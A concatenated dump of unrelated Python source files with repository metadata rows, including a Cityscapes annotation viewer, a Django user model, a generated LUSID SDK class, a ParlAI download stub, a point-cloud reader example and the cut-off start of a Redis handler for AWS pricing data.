# Draw the image in the given QPainter qp
def drawImage(self, qp):
# Return if no image available
if self.image.isNull():
return
# Save the painters current setting to a stack
qp.save()
# Draw the image
qp.drawImage(QtCore.QRect( self.xoff, self.yoff, self.w, self.h ), self.image)
# Restore the saved setting from the stack
qp.restore()
def getPolygon(self, obj):
poly = QtGui.QPolygonF()
for pt in obj.polygon:
point = QtCore.QPointF(pt.x,pt.y)
poly.append( point )
return poly
# Draw the labels in the given QPainter qp
# optionally provide a list of labels to ignore
def drawLabels(self, qp, ignore = []):
if self.image.isNull() or self.w == 0 or self.h == 0:
return
if not self.annotation:
return
# The overlay is created in the viewing coordinates
# This way, the drawing is more dense and the polygon edges are nicer
# We create an image that is the overlay
# Within this image we draw using another QPainter
# Finally we use the real QPainter to overlay the overlay-image on what is drawn so far
# The image that is used to draw the overlays
overlay = QtGui.QImage( self.w, self.h, QtGui.QImage.Format_ARGB32_Premultiplied )
# Fill the image with the default color
defaultLabel = name2label[self.defaultLabel]
col = QtGui.QColor( *defaultLabel.color )
overlay.fill( col )
# Create a new QPainter that draws in the overlay image
qp2 = QtGui.QPainter()
qp2.begin(overlay)
# The color of the outlines
qp2.setPen(QtGui.QColor('white'))
# Draw all objects
for obj in self.annotation.objects:
# The label of the object
name = assureSingleInstanceName( obj.label )
# If we do not know a color for this label, warn the user
if name not in name2label:
print("The annotations contain unkown labels. This should not happen. Please inform the datasets authors. Thank you!")
print("Details: label '{}', file '{}'".format(name,self.currentLabelFile))
continue
poly = self.getPolygon(obj)
# Scale the polygon properly
polyToDraw = poly * QtGui.QTransform.fromScale(self.scale,self.scale)
# Default drawing
# Color from color table, solid brush
col = QtGui.QColor( *name2label[name].color )
brush = QtGui.QBrush( col, QtCore.Qt.SolidPattern )
qp2.setBrush(brush)
# Overwrite drawing if this is the highlighted object
if self.highlightObj and obj == self.highlightObj:
# First clear everything below of the polygon
qp2.setCompositionMode( QtGui.QPainter.CompositionMode_Clear )
qp2.drawPolygon( polyToDraw )
qp2.setCompositionMode( QtGui.QPainter.CompositionMode_SourceOver )
# Set the drawing to a special pattern
brush = QtGui.QBrush(col,QtCore.Qt.DiagCrossPattern)
qp2.setBrush(brush)
qp2.drawPolygon( polyToDraw )
# Draw outline of selected object dotted
if self.highlightObj:
brush = QtGui.QBrush(QtCore.Qt.NoBrush)
qp2.setBrush(brush)
qp2.setPen(QtCore.Qt.DashLine)
polyToDraw = self.getPolygon(self.highlightObj) * QtGui.QTransform.fromScale(self.scale,self.scale)
qp2.drawPolygon( polyToDraw )
# End the drawing of the overlay
qp2.end()
# Save QPainter settings to stack
qp.save()
# Define transparency
qp.setOpacity(self.transp)
# Draw the overlay image
qp.drawImage(self.xoff,self.yoff,overlay)
# Restore settings
qp.restore()
return overlay
def getBoundingBox(self, obj):
bbox = QtCore.QRectF(obj.bbox[0], obj.bbox[1], obj.bbox[2], obj.bbox[3])
bboxVis = QtCore.QRectF(obj.bboxVis[0], obj.bboxVis[1], obj.bboxVis[2], obj.bboxVis[3])
return bbox, bboxVis
def scaleBoundingBox(self, bbox):
bboxToDraw = copy.deepcopy(bbox)
x,y,w,h = bboxToDraw.getRect()
bboxToDraw.setTopLeft(QtCore.QPointF(x*self.scale, y*self.scale))
bboxToDraw.setSize(QtCore.QSizeF(w*self.scale, h*self.scale))
return bboxToDraw
# Draw the labels in the given QPainter qp
# optionally provide a list of labels to ignore
def drawBboxes(self, qp, ignore = []):
if self.image.isNull() or self.w == 0 or self.h == 0:
return
if not self.annotation:
return
# The overlay is created in the viewing coordinates
# This way, the drawing is more dense and the polygon edges are nicer
# We create an image that is the overlay
# Within this image we draw using another QPainter
# Finally we use the real QPainter to overlay the overlay-image on what is drawn so far
# The image that is used to draw the overlays
overlay = QtGui.QImage( self.w, self.h, QtGui.QImage.Format_ARGB32_Premultiplied )
# Fill the image
col = QtGui.QColor(0, 0, 0, 0)
overlay.fill( col )
# Create a new QPainter that draws in the overlay image
qp2 = QtGui.QPainter()
qp2.begin(overlay)
# Draw all objects
for obj in self.annotation.objects:
bbox, bboxVis = self.getBoundingBox(obj)
bboxToDraw = self.scaleBoundingBox(bbox)
bboxVisToDraw = self.scaleBoundingBox(bbox)
# The label of the object
name = obj.label
# If we do not know a color for this label, warn the user
if name not in name2labelCp:
print("The annotations contain unknown labels. This should not happen. Please inform the datasets authors. Thank you!")
print("Details: label '{}', file '{}'".format(name,self.currentLabelFile))
continue
# Reset brush for QPainter object
qp2.setBrush(QtGui.QBrush())
# Color from color table
col = QtGui.QColor( *name2labelCp[name].color )
if name2labelCp[name].hasInstances:
if self.highlightObj and obj == self.highlightObj:
pen = QtGui.QPen(QtGui.QBrush( col ), 5.0)
else:
pen = QtGui.QPen(QtGui.QBrush( col ), 3.0)
qp2.setPen(pen)
qp2.setOpacity(1.0)
qp2.drawRect( bboxToDraw )
if self.highlightObj and obj == self.highlightObj:
pen = QtGui.QPen(QtGui.QBrush( col ), 3.0, style=QtCore.Qt.DotLine)
qp2.setPen(pen)
qp2.setOpacity(1.0)
qp2.drawRect( bboxVisToDraw )
else:
pen = QtGui.QPen(QtGui.QBrush( col ), 1.0, style=QtCore.Qt.DashLine)
qp2.setPen(pen)
qp2.setOpacity(1.0)
qp2.drawRect( bboxVisToDraw )
qp2.setBrush(QtGui.QBrush( col, QtCore.Qt.SolidPattern ))
qp2.setOpacity(0.4)
qp2.drawRect( bboxVisToDraw )
else:
if self.highlightObj and obj == self.highlightObj:
pen = QtGui.QPen(QtGui.QBrush( col ), 3.0)
qp2.setPen(pen)
qp2.setBrush(QtGui.QBrush( col, QtCore.Qt.NoBrush ))
else:
pen = QtGui.QPen(QtGui.QBrush( col ), 1.0)
qp2.setPen(pen)
qp2.setBrush(QtGui.QBrush( col, QtCore.Qt.DiagCrossPattern ))
qp2.setOpacity(1.0)
qp2.drawRect( bboxToDraw )
# End the drawing of the overlay
qp2.end()
# Save QPainter settings to stack
qp.save()
# Define transparency
qp.setOpacity(self.transp)
# Draw the overlay image
qp.drawImage(self.xoff,self.yoff,overlay)
# Restore settings
qp.restore()
return overlay
# Draw the label name next to the mouse
def drawLabelAtMouse(self, qp):
# Nothing to do without a highlighted object
if not self.highlightObj:
return
# Nothing to without a mouse position
if not self.mousePosOrig:
return
# Save QPainter settings to stack
qp.save()
# That is the mouse positiong
mouse = self.mousePosOrig
# Will show zoom
showZoom = self.zoom and not self.image.isNull() and self.w and self.h
# The text that is written next to the mouse
mouseText = self.highlightObj.label
# Where to write the text
# Depends on the zoom (additional offset to mouse to make space for zoom?)
# The location in the image (if we are at the top we want to write below of the mouse)
off = 36
if showZoom:
off += self.zoomSize/2
if mouse.y()-off > self.toolbar.height():
top = mouse.y()-off
btm = mouse.y()
vAlign = QtCore.Qt.AlignTop
else:
# The height of the cursor
if not showZoom:
off += 20
top = mouse.y()
btm = mouse.y()+off
vAlign = QtCore.Qt.AlignBottom
# Here we can draw
rect = QtCore.QRect()
rect.setTopLeft(QtCore.QPoint(mouse.x()-200,top))
rect.setBottomRight(QtCore.QPoint(mouse.x()+200,btm))
# The color
qp.setPen(QtGui.QColor('white'))
# The font to use
font = QtGui.QFont("Helvetica",20,QtGui.QFont.Bold)
qp.setFont(font)
# Non-transparent
qp.setOpacity(1)
# Draw the text, horizontally centered
qp.drawText(rect,QtCore.Qt.AlignHCenter|vAlign,mouseText)
# Restore settings
qp.restore()
# Draw the zoom
def drawZoom(self,qp,overlay):
# Zoom disabled?
if not self.zoom:
return
# No image
if self.image.isNull() or not self.w or not self.h:
return
# No mouse
if not self.mousePosOrig:
return
# Abbrevation for the zoom window size
zoomSize = self.zoomSize
# Abbrevation for the mouse position
mouse = self.mousePosOrig
# The pixel that is the zoom center
pix = self.mousePosScaled
# The size of the part of the image that is drawn in the zoom window
selSize = zoomSize / ( self.zoomFactor * self.zoomFactor )
# The selection window for the image
sel = QtCore.QRectF(pix.x() -selSize/2 ,pix.y() -selSize/2 ,selSize,selSize )
# The selection window for the widget
view = QtCore.QRectF(mouse.x()-zoomSize/2,mouse.y()-zoomSize/2,zoomSize,zoomSize)
if overlay :
overlay_scaled = overlay.scaled(self.image.width(), self.image.height())
else :
overlay_scaled = QtGui.QImage( self.image.width(), self.image.height(), QtGui.QImage.Format_ARGB32_Premultiplied )
# Show the zoom image
qp.save()
qp.drawImage(view,self.image,sel)
qp.setOpacity(self.transp)
qp.drawImage(view,overlay_scaled,sel)
qp.restore()
# Draw disparities
def drawDisp( self , qp ):
if not self.dispOverlay:
return
# Save QPainter settings to stack
qp.save()
# Define transparency
qp.setOpacity(self.transp)
# Draw the overlay image
qp.drawImage(QtCore.QRect( self.xoff, self.yoff, self.w, self.h ),self.dispOverlay)
# Restore settings
qp.restore()
return self.dispOverlay
#############################
## Mouse/keyboard events
#############################
# Mouse moved
# Need to save the mouse position
# Need to drag a polygon point
# Need to update the mouse selected object
def mouseMoveEvent(self,event):
if self.image.isNull() or self.w == 0 or self.h == 0:
return
mousePosOrig = QtCore.QPointF( event.x() , event.y() )
mousePosScaled = QtCore.QPointF( float(mousePosOrig.x() - self.xoff) / self.scale , float(mousePosOrig.y() - self.yoff) / self.scale )
mouseOutsideImage = not self.image.rect().contains( mousePosScaled.toPoint() )
mousePosScaled.setX( max( mousePosScaled.x() , 0. ) )
mousePosScaled.setY( max( mousePosScaled.y() , 0. ) )
mousePosScaled.setX( min( mousePosScaled.x() , self.image.rect().right() ) )
mousePosScaled.setY( min( mousePosScaled.y() , self.image.rect().bottom() ) )
if not self.image.rect().contains( mousePosScaled.toPoint() ):
print(self.image.rect())
print(mousePosScaled.toPoint())
self.mousePosScaled = None
self.mousePosOrig = None
self.updateMouseObject()
self.update()
return
self.mousePosScaled = mousePosScaled
self.mousePosOrig = mousePosOrig
self.mouseOutsideImage = mouseOutsideImage
# Redraw
self.updateMouseObject()
self.update()
# Mouse left the widget
def leaveEvent(self, event):
self.mousePosOrig = None
self.mousePosScaled = None
self.mouseOutsideImage = True
# Mouse wheel scrolled
def wheelEvent(self, event):
ctrlPressed = event.modifiers() & QtCore.Qt.ControlModifier
deltaDegree = event.angleDelta().y() / 8 # Rotation in degree
deltaSteps = deltaDegree / 15 # Usually one step on the mouse is 15 degrees
if ctrlPressed:
self.transp = max(min(self.transp+(deltaSteps*0.1),1.0),0.0)
self.update()
else:
if self.zoom:
# If shift is pressed, change zoom window size
if event.modifiers() and QtCore.Qt.Key_Shift:
self.zoomSize += deltaSteps * 10
self.zoomSize = max( self.zoomSize, 10 )
self.zoomSize = min( self.zoomSize, 1000 )
# Change zoom factor
else:
self.zoomFactor += deltaSteps * 0.05
self.zoomFactor = max( self.zoomFactor, 0.1 )
self.zoomFactor = min( self.zoomFactor, 10 )
self.update()
#############################
## Little helper methods
#############################
# Helper method that sets tooltip and statustip
# Provide an QAction and the tip text
# This text is appended with a hotkeys and then assigned
def setTip( self, action, tip ):
tip += " (Hotkeys: '" + "', '".join([str(s.toString()) for s in action.shortcuts()]) + "')"
action.setStatusTip(tip)
action.setToolTip(tip)
# Update the object that is selected by the current mouse curser
def updateMouseObject(self):
self.mouseObj = -1
if self.mousePosScaled is None:
return
for idx in reversed(range(len(self.annotation.objects))):
obj = self.annotation.objects[idx]
if obj.objectType == CsObjectType.POLY:
if self.getPolygon(obj).containsPoint(self.mousePosScaled, QtCore.Qt.OddEvenFill):
self.mouseObj = idx
break
elif obj.objectType == CsObjectType.BBOX:
bbox, _ = self.getBoundingBox(obj)
if bbox.contains(self.mousePosScaled):
self.mouseObj = idx
break
# Clear the current labels
def clearAnnotation(self):
self.annotation = None
self.currentLabelFile = ""
def getCityFromUser(self):
# Reset the status bar to this message when leaving
restoreMessage = self.statusBar().currentMessage()
if 'CITYSCAPES_DATASET' in os.environ:
csPath = os.environ['CITYSCAPES_DATASET']
else:
csPath = os.path.join(os.path.dirname(os.path.realpath(__file__)),'..','..')
availableCities = []
annotations = [ "gtFine" , "gtCoarse" , "gtBboxCityPersons" ]
splits = [ "train_extra" , "train" , "val" , "test" ]
for gt in annotations:
for split in splits:
cities = glob.glob(os.path.join(csPath, gt, split, '*'))
cities.sort()
availableCities.extend( [ (split,gt,os.path.basename(c)) for c in cities if os.listdir(c) ] )
# List of possible labels
items = [split + ", " + gt + ", " + city for (split,gt,city) in availableCities]
# Specify title
dlgTitle = "Select new city"
message = dlgTitle
question = dlgTitle
message = "Select city for viewing"
question = "Which city would you like to view?"
self.statusBar().showMessage(message)
if items:
# Create and wait for dialog
(item, ok) = QtWidgets.QInputDialog.getItem(self, dlgTitle, question,
items, 0, False)
# Restore message
self.statusBar().showMessage(restoreMessage)
if ok and item:
(split, gt, city) = [str(i) for i in item.split(', ')]
if split == 'test' and not self.showDisparity:
self.transp = 0.1
else:
self.transp = 0.5
self.city = os.path.normpath(os.path.join(csPath, "leftImg8bit", split, city))
self.labelPath = os.path.normpath(os.path.join(csPath, gt , split, city))
self.dispPath = os.path.normpath(os.path.join(csPath, "disparity" , split, city))
if gt in [ "gtFine", "gtCoarse" ]:
self.gtType = CsObjectType.POLY
elif gt in [ "gtBboxCityPersons" ]:
self.gtType = CsObjectType.BBOX
self.loadCity()
self.imageChanged()
else:
warning = ""
warning += "The data was not found. Please:\n\n"
warning += " - make sure the scripts folder is in the Cityscapes root folder\n"
warning += "or\n"
warning += " - set CITYSCAPES_DATASET to the Cityscapes root folder\n"
warning += " e.g. 'export CITYSCAPES_DATASET=<root_path>'\n"
reply = QtWidgets.QMessageBox.information(self, "ERROR!", warning,
QtWidgets.QMessageBox.Ok)
if reply == QtWidgets.QMessageBox.Ok:
sys.exit()
return
# Determine if the given candidate for a label path makes sense
def isLabelPathValid(self, labelPath):
return os.path.isdir(labelPath)
# Get the filename where to load labels
# Returns empty string if not possible
def getLabelFilename(self):
# And we need to have a directory where labels should be searched
if not self.labelPath:
return ""
# Without the name of the current images, there is also nothing we can do
if not self.currentFile:
return ""
# Check if the label directory is valid.
if not self.isLabelPathValid(self.labelPath):
return ""
# Generate the filename of the label file
filename = os.path.basename(self.currentFile)
filename = filename.replace(self.imageExt, self.gtExt)
filename = os.path.join(self.labelPath, filename)
search = glob.glob(filename)
if not search:
return ""
filename = os.path.normpath(search[0])
return filename
# Get the filename where to load disparities
# Returns empty string if not possible
def getDisparityFilename( self ):
# And we need to have a directory where disparities should be searched
if not self.dispPath:
return ""
# Without the name of the current images, there is also nothing we can do
if not self.currentFile:
return ""
# Check if the label directory is valid.
if not os.path.isdir(self.dispPath):
return ""
# Generate the filename of the label file
filename = os.path.basename( self.currentFile )
filename = filename.replace( self.imageExt , self.dispExt )
filename = os.path.join( self.dispPath , filename )
filename = os.path.normpath(filename)
return filename
# Disable the popup menu on right click
def createPopupMenu(self):
pass
def main():
app = QtWidgets.QApplication(sys.argv)
tool = CityscapesViewer()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
| 37.422697 | 142 | 0.58856 |
c9de4ffb21a986b82dbb8f892a05e59ed3884b9c | 1,433 | py | Python | readme.py | khushbooG9/nvm | c065af6ae1cb330cf0716d35bc4aebd46547888e | [
"MIT"
] | 3 | 2020-11-18T11:04:03.000Z | 2021-03-31T06:58:49.000Z | readme.py | khushbooG9/nvm | c065af6ae1cb330cf0716d35bc4aebd46547888e | [
"MIT"
] | null | null | null | readme.py | khushbooG9/nvm | c065af6ae1cb330cf0716d35bc4aebd46547888e | [
"MIT"
] | 4 | 2019-07-23T04:42:55.000Z | 2022-02-07T02:57:59.000Z | register_names = ["r0", "r1"]
programs = {
"myfirstprogram":"""
### computes logical-and of r0 and r1, overwriting r0 with result
nop # do nothing
sub and # call logical-and sub-routine
exit # halt execution
and: cmp r0 false # compare first conjunct to false
jie and.f # jump, if equal to false, to and.f label
cmp r1 false # compare second conjunct to false
jie and.f # jump, if equal false, to and.f label
mov r0 true # both conjuncts true, set r0 to true
ret # return from sub-routine
and.f: mov r0 false # a conjunct was false, set r0 to false
ret # return from sub-routine
"""}
from nvm.nvm import make_scaled_nvm
my_nvm = make_scaled_nvm(
register_names = register_names,
programs = programs,
orthogonal=True)
my_nvm.assemble(programs)
my_nvm.load("myfirstprogram",
initial_state = {"r0":"true","r1":"false"})
print(my_nvm.net.layers["r0"].shape)
print(my_nvm.net.activity["r0"].T)
v = my_nvm.net.activity["r0"].T
print(my_nvm.net.layers["r0"].coder.decode(v))
print(my_nvm.decode_state(layer_names=register_names))
import itertools
for t in itertools.count():
my_nvm.net.tick()
if my_nvm.at_exit(): break
print(my_nvm.net.layers["opc"].coder.decode(my_nvm.net.activity["opc"]) == "exit")
print(t)
print(my_nvm.decode_state(layer_names=register_names))
| 27.557692 | 82 | 0.655967 |
123216561ac776907a92673ff607efe113055d0e | 54 | py | Python | melomaniac/soundcloud/__init__.py | sdispater/melomaniac | 26edeba844d4822bb1df287d996356786d6d7a38 | [
"MIT"
] | 18 | 2016-09-30T21:48:57.000Z | 2022-01-10T12:58:01.000Z | melomaniac/gmusic/__init__.py | sdispater/melomaniac | 26edeba844d4822bb1df287d996356786d6d7a38 | [
"MIT"
] | 3 | 2018-01-17T19:59:08.000Z | 2020-10-09T01:00:39.000Z | melomaniac/gmusic/__init__.py | sdispater/melomaniac | 26edeba844d4822bb1df287d996356786d6d7a38 | [
"MIT"
] | 4 | 2017-12-27T02:19:01.000Z | 2019-07-20T18:07:59.000Z | # -*- coding: utf-8 -*-
from .backend import Backend
| 13.5 | 28 | 0.62963 |
7d5e56a5186b48e5ace3644e73993ff01665b1f8 | 1,001 | py | Python | app_user/models.py | ybedirhanpak/infinite-workout-server | ba23f6f568129c68b0e5166ce2960bde1c5d75f2 | [
"MIT"
] | null | null | null | app_user/models.py | ybedirhanpak/infinite-workout-server | ba23f6f568129c68b0e5166ce2960bde1c5d75f2 | [
"MIT"
] | 1 | 2020-08-17T20:23:34.000Z | 2020-08-17T20:23:34.000Z | app_user/models.py | ybedirhanpak/infinite-workout-server | ba23f6f568129c68b0e5166ce2960bde1c5d75f2 | [
"MIT"
] | null | null | null | from django.db import models
from django.contrib.auth.base_user import AbstractBaseUser
from django.contrib.auth.models import PermissionsMixin
from app_common.models import BaseModel
from .managers import UserManager
class User(PermissionsMixin, AbstractBaseUser, BaseModel):
username = models.CharField(max_length=255, unique=True)
email = models.EmailField(unique=True)
full_name = models.CharField(max_length=255, null=True, blank=True)
age = models.PositiveIntegerField(null=True, blank=True)
weight = models.PositiveIntegerField(null=True, blank=True)
bio = models.TextField(null=True, blank=True)
is_visible = models.BooleanField(default=True)
is_active = models.BooleanField(default=True)
is_staff = models.BooleanField(default=False)
is_superuser = models.BooleanField(default=False)
USERNAME_FIELD = 'email'
EMAIL_FIELD = 'email'
objects = UserManager()
def __str__(self):
return '{}-{}'.format(self.username, self.email)
| 37.074074 | 71 | 0.756244 |
a026c05a6d9b62216e89db9aca5ec4a0a0f04efc | 1,298 | py | Python | examples/official/IO/pcd_read.py | conica-cui/python-pcl | b54e80e7da94ac9e2279b95fdac597f1de7145d7 | [
"BSD-3-Clause"
] | 1,705 | 2015-01-08T08:25:12.000Z | 2022-03-31T07:02:55.000Z | examples/official/IO/pcd_read.py | Sh4zKh4n/python-pcl | 1d83d2d7ce9ce2c22ff5855249459bfc22025000 | [
"BSD-3-Clause"
] | 331 | 2015-01-03T12:31:01.000Z | 2022-03-31T21:00:32.000Z | examples/official/IO/pcd_read.py | Sh4zKh4n/python-pcl | 1d83d2d7ce9ce2c22ff5855249459bfc22025000 | [
"BSD-3-Clause"
] | 666 | 2015-01-15T03:42:49.000Z | 2022-03-25T13:48:33.000Z | # -*- coding: utf-8 -*-
#
# #include <iostream>
# #include <pcl/io/pcd_io.h>
# #include <pcl/point_types.h>
#
# int main (int argc, char** argv)
# {
# pcl::PointCloud<pcl::PointXYZ>::Ptr cloud (new pcl::PointCloud<pcl::PointXYZ>);
#
# if (pcl::io::loadPCDFile<pcl::PointXYZ> ("test_pcd.pcd", *cloud) == -1) //* load the file
# {
# PCL_ERROR ("Couldn't read file test_pcd.pcd \n");
# return (-1);
# }
# std::cout << "Loaded "
# << cloud->width * cloud->height
# << " data points from test_pcd.pcd with the following fields: "
# << std::endl;
# for (size_t i = 0; i < cloud->points.size (); ++i)
# std::cout << " " << cloud->points[i].x
# << " " << cloud->points[i].y
# << " " << cloud->points[i].z << std::endl;
#
# return (0);
# }
import pcl
def main():
cloud = pcl.load('./examples/official/IO/test_pcd.pcd')
print('Loaded ' + str(cloud.width * cloud.height) +
' data points from test_pcd.pcd with the following fields: ')
for i in range(0, cloud.size):
print('x: ' + str(cloud[i][0]) + ', y : ' +
str(cloud[i][1]) + ', z : ' + str(cloud[i][2]))
if __name__ == "__main__":
# import cProfile
# cProfile.run('main()', sort='time')
main()
| 28.844444 | 93 | 0.523883 |
68f4d0f73cdbde3d11574fb6e01b7e55988c27d7 | 105 | py | Python | tests/integration/__init__.py | langrenn-sprint/photo-service | 9383ec0a12f49247cb0ac2255012d0e87e896e4e | [
"Apache-2.0"
] | null | null | null | tests/integration/__init__.py | langrenn-sprint/photo-service | 9383ec0a12f49247cb0ac2255012d0e87e896e4e | [
"Apache-2.0"
] | null | null | null | tests/integration/__init__.py | langrenn-sprint/photo-service | 9383ec0a12f49247cb0ac2255012d0e87e896e4e | [
"Apache-2.0"
] | null | null | null | """Integration test package.
Modules:
test_factory
test_ping
test_ready
test_photos
"""
| 11.666667 | 28 | 0.67619 |
b26dd5fa2444ac01582801ccaef8e46766ef4fa2 | 5,815 | py | Python | sdk/lusid_asyncio/models/atom_value_string.py | finbourne/lusid-sdk-python-asyncio-preview | 290f93590ab5485661216c8622d3de9f7af0ed60 | [
"MIT"
] | null | null | null | sdk/lusid_asyncio/models/atom_value_string.py | finbourne/lusid-sdk-python-asyncio-preview | 290f93590ab5485661216c8622d3de9f7af0ed60 | [
"MIT"
] | null | null | null | sdk/lusid_asyncio/models/atom_value_string.py | finbourne/lusid-sdk-python-asyncio-preview | 290f93590ab5485661216c8622d3de9f7af0ed60 | [
"MIT"
] | null | null | null | # coding: utf-8
"""
LUSID API
FINBOURNE Technology # noqa: E501
The version of the OpenAPI document: 0.11.3923
Contact: info@finbourne.com
Generated by: https://openapi-generator.tech
"""
try:
from inspect import getfullargspec
except ImportError:
from inspect import getargspec as getfullargspec
import pprint
import re # noqa: F401
import six
from lusid_asyncio.configuration import Configuration
class AtomValueString(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
required_map (dict): The key is attribute name
and the value is whether it is 'required' or 'optional'.
"""
openapi_types = {
'value': 'str',
'atom_value_type': 'str'
}
attribute_map = {
'value': 'value',
'atom_value_type': 'atomValueType'
}
required_map = {
'value': 'optional',
'atom_value_type': 'required'
}
def __init__(self, value=None, atom_value_type=None, local_vars_configuration=None): # noqa: E501
"""AtomValueString - a model defined in OpenAPI"
:param value: The value itself
:type value: str
:param atom_value_type: The available values are: AtomValueInt, AtomValueDecimal, AtomValueString, AtomValue0D, AtomValue (required)
:type atom_value_type: str
""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration.get_default_copy()
self.local_vars_configuration = local_vars_configuration
self._value = None
self._atom_value_type = None
self.discriminator = None
self.value = value
self.atom_value_type = atom_value_type
@property
def value(self):
"""Gets the value of this AtomValueString. # noqa: E501
The value itself # noqa: E501
:return: The value of this AtomValueString. # noqa: E501
:rtype: str
"""
return self._value
@value.setter
def value(self, value):
"""Sets the value of this AtomValueString.
The value itself # noqa: E501
:param value: The value of this AtomValueString. # noqa: E501
:type value: str
"""
self._value = value
@property
def atom_value_type(self):
"""Gets the atom_value_type of this AtomValueString. # noqa: E501
The available values are: AtomValueInt, AtomValueDecimal, AtomValueString, AtomValue0D, AtomValue # noqa: E501
:return: The atom_value_type of this AtomValueString. # noqa: E501
:rtype: str
"""
return self._atom_value_type
@atom_value_type.setter
def atom_value_type(self, atom_value_type):
"""Sets the atom_value_type of this AtomValueString.
The available values are: AtomValueInt, AtomValueDecimal, AtomValueString, AtomValue0D, AtomValue # noqa: E501
:param atom_value_type: The atom_value_type of this AtomValueString. # noqa: E501
:type atom_value_type: str
"""
if self.local_vars_configuration.client_side_validation and atom_value_type is None: # noqa: E501
raise ValueError("Invalid value for `atom_value_type`, must not be `None`") # noqa: E501
allowed_values = ["AtomValueInt", "AtomValueDecimal", "AtomValueString", "AtomValue0D", "AtomValue"] # noqa: E501
if self.local_vars_configuration.client_side_validation and atom_value_type not in allowed_values: # noqa: E501
raise ValueError(
"Invalid value for `atom_value_type` ({0}), must be one of {1}" # noqa: E501
.format(atom_value_type, allowed_values)
)
self._atom_value_type = atom_value_type
def to_dict(self, serialize=False):
"""Returns the model properties as a dict"""
result = {}
def convert(x):
if hasattr(x, "to_dict"):
args = getfullargspec(x.to_dict).args
if len(args) == 1:
return x.to_dict()
else:
return x.to_dict(serialize)
else:
return x
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
attr = self.attribute_map.get(attr, attr) if serialize else attr
if isinstance(value, list):
result[attr] = list(map(
lambda x: convert(x),
value
))
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], convert(item[1])),
value.items()
))
else:
result[attr] = convert(value)
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, AtomValueString):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, AtomValueString):
return True
return self.to_dict() != other.to_dict()
| 31.775956 | 141 | 0.604299 |
b8f7ba0dc35228c56b0d49a71cb8615c94f9c208 | 1,164 | py | Python | test/vanilla/Expected/AcceptanceTests/ModelFlattening/setup.py | amrElroumy/autorest.python | b37af1779f6d53b4fa0d92da62151f8133006f98 | [
"MIT"
] | null | null | null | test/vanilla/Expected/AcceptanceTests/ModelFlattening/setup.py | amrElroumy/autorest.python | b37af1779f6d53b4fa0d92da62151f8133006f98 | [
"MIT"
] | null | null | null | test/vanilla/Expected/AcceptanceTests/ModelFlattening/setup.py | amrElroumy/autorest.python | b37af1779f6d53b4fa0d92da62151f8133006f98 | [
"MIT"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
# coding: utf-8
from setuptools import setup, find_packages
NAME = "autorestresourceflatteningtestservice"
VERSION = "0.1.0"
# To install the library, run the following
#
# python setup.py install
#
# prerequisite: setuptools
# http://pypi.python.org/pypi/setuptools
REQUIRES = ["msrest>=0.6.18", "azure-core<2.0.0,>=1.8.2"]
setup(
name=NAME,
version=VERSION,
description="AutoRestResourceFlatteningTestService",
author_email="",
url="",
keywords=["Swagger", "AutoRestResourceFlatteningTestService"],
install_requires=REQUIRES,
packages=find_packages(),
include_package_data=True,
long_description="""\
Resource Flattening for AutoRest.
""",
)
| 30.631579 | 94 | 0.636598 |
1854aa0c272e66350d639503e53394931cd7f51a | 572 | py | Python | doc/integrations/pytorch/parlai/zoo/image_chat/transresnet_multimodal.py | novium258/cortx-1 | ce5b939b33b8d24d89b31807ac3bcaa8f24096bc | [
"Apache-2.0"
] | 1 | 2020-09-27T05:00:06.000Z | 2020-09-27T05:00:06.000Z | doc/integrations/pytorch/parlai/zoo/image_chat/transresnet_multimodal.py | novium258/cortx-1 | ce5b939b33b8d24d89b31807ac3bcaa8f24096bc | [
"Apache-2.0"
] | 1 | 2021-08-04T11:17:39.000Z | 2021-08-04T11:17:39.000Z | doc/integrations/pytorch/parlai/zoo/image_chat/transresnet_multimodal.py | novium258/cortx-1 | ce5b939b33b8d24d89b31807ac3bcaa8f24096bc | [
"Apache-2.0"
] | 1 | 2021-05-03T13:27:14.000Z | 2021-05-03T13:27:14.000Z | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""
Pretrained Transresnet Multimodal model on the Image-Chat task.
"""
from parlai.core.build_data import download_models
def download(datapath):
"""
Download the model.
"""
opt = {'datapath': datapath, 'model_type': 'transresnet_multimodal'}
fnames = ['transresnet_multimodal.tgz']
download_models(opt, fnames, 'image_chat')
| 28.6 | 73 | 0.699301 |
fb824ba6936f7dc99213ac80caeb082489a2cdb0 | 8,051 | py | Python | sethji/model/redis_handler.py | rohit01/aws-price-umbrella | 109e94282ba94cf9c457887851109c2ff6333e99 | [
"MIT"
] | null | null | null | sethji/model/redis_handler.py | rohit01/aws-price-umbrella | 109e94282ba94cf9c457887851109c2ff6333e99 | [
"MIT"
] | null | null | null | sethji/model/redis_handler.py | rohit01/aws-price-umbrella | 109e94282ba94cf9c457887851109c2ff6333e99 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -
#
import gevent
import gevent.monkey
gevent.monkey.patch_all()
import redis
import time
connection_pool = None
class RedisHandler(object):
def __init__(self, host=None, port=None, password=None, idle_timeout=None):
global connection_pool
if host is None:
host = '127.0.0.1'
if port is None:
port = 6379
if not connection_pool:
connection_pool = redis.ConnectionPool(host=host, port=port,
password=password)
self.connection = redis.StrictRedis(connection_pool=connection_pool)
self.idle_timeout = idle_timeout
self.instance_hash_prefix = 'aws:ec2:instance' ## Suffix: region, instance id
self.ebs_vol_hash_prefix = 'aws:ec2:ebs:vol' ## Suffix: region, volume id
